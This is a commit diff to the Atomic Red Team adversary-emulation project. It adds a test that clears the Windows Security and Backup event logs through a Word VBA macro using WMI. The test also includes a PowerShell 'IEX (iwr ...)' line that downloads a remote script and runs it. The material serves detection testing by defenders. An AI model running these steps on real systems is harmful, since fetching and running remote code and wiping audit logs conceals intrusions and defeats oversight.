initial (#1333)

* initial

* hard-code to winword process

Co-authored-by: avocado <avocados@smuggler.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1070.001/T1070.001.yaml

@@ -32,3 +32,29 @@ atomic_tests:
       Get-EventLog -list
     name: powershell
     elevation_required: true
+- name: Clear Event Logs via VBA
+  auto_generated_guid: 
+  description: |
+    This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. 
+
+    Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Microsoft Word must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "Word.Application" | Out-Null
+        Stop-Process -Name "winword"
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+  executor:
+    command: |
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
+    name: powershell
+    elevation_required: true

atomics/T1070.001/src/T1070.001-macrocode.txt

@@ -0,0 +1,12 @@
+Sub ClearLogs()
+
+    Dim objWMIService, colLogFiles, objLogfile As Object
+    
+    Set objWMIService = GetObject("winmgmts:{(Backup, Security)}!\\.\root\cimv2")
+    Set colLogFiles = objWMIService.ExecQuery("Select * from Win32_NTEventLogFile")
+    
+    For Each objLogfile In colLogFiles
+        objLogfile.ClearEventLog
+    Next
+
+End Sub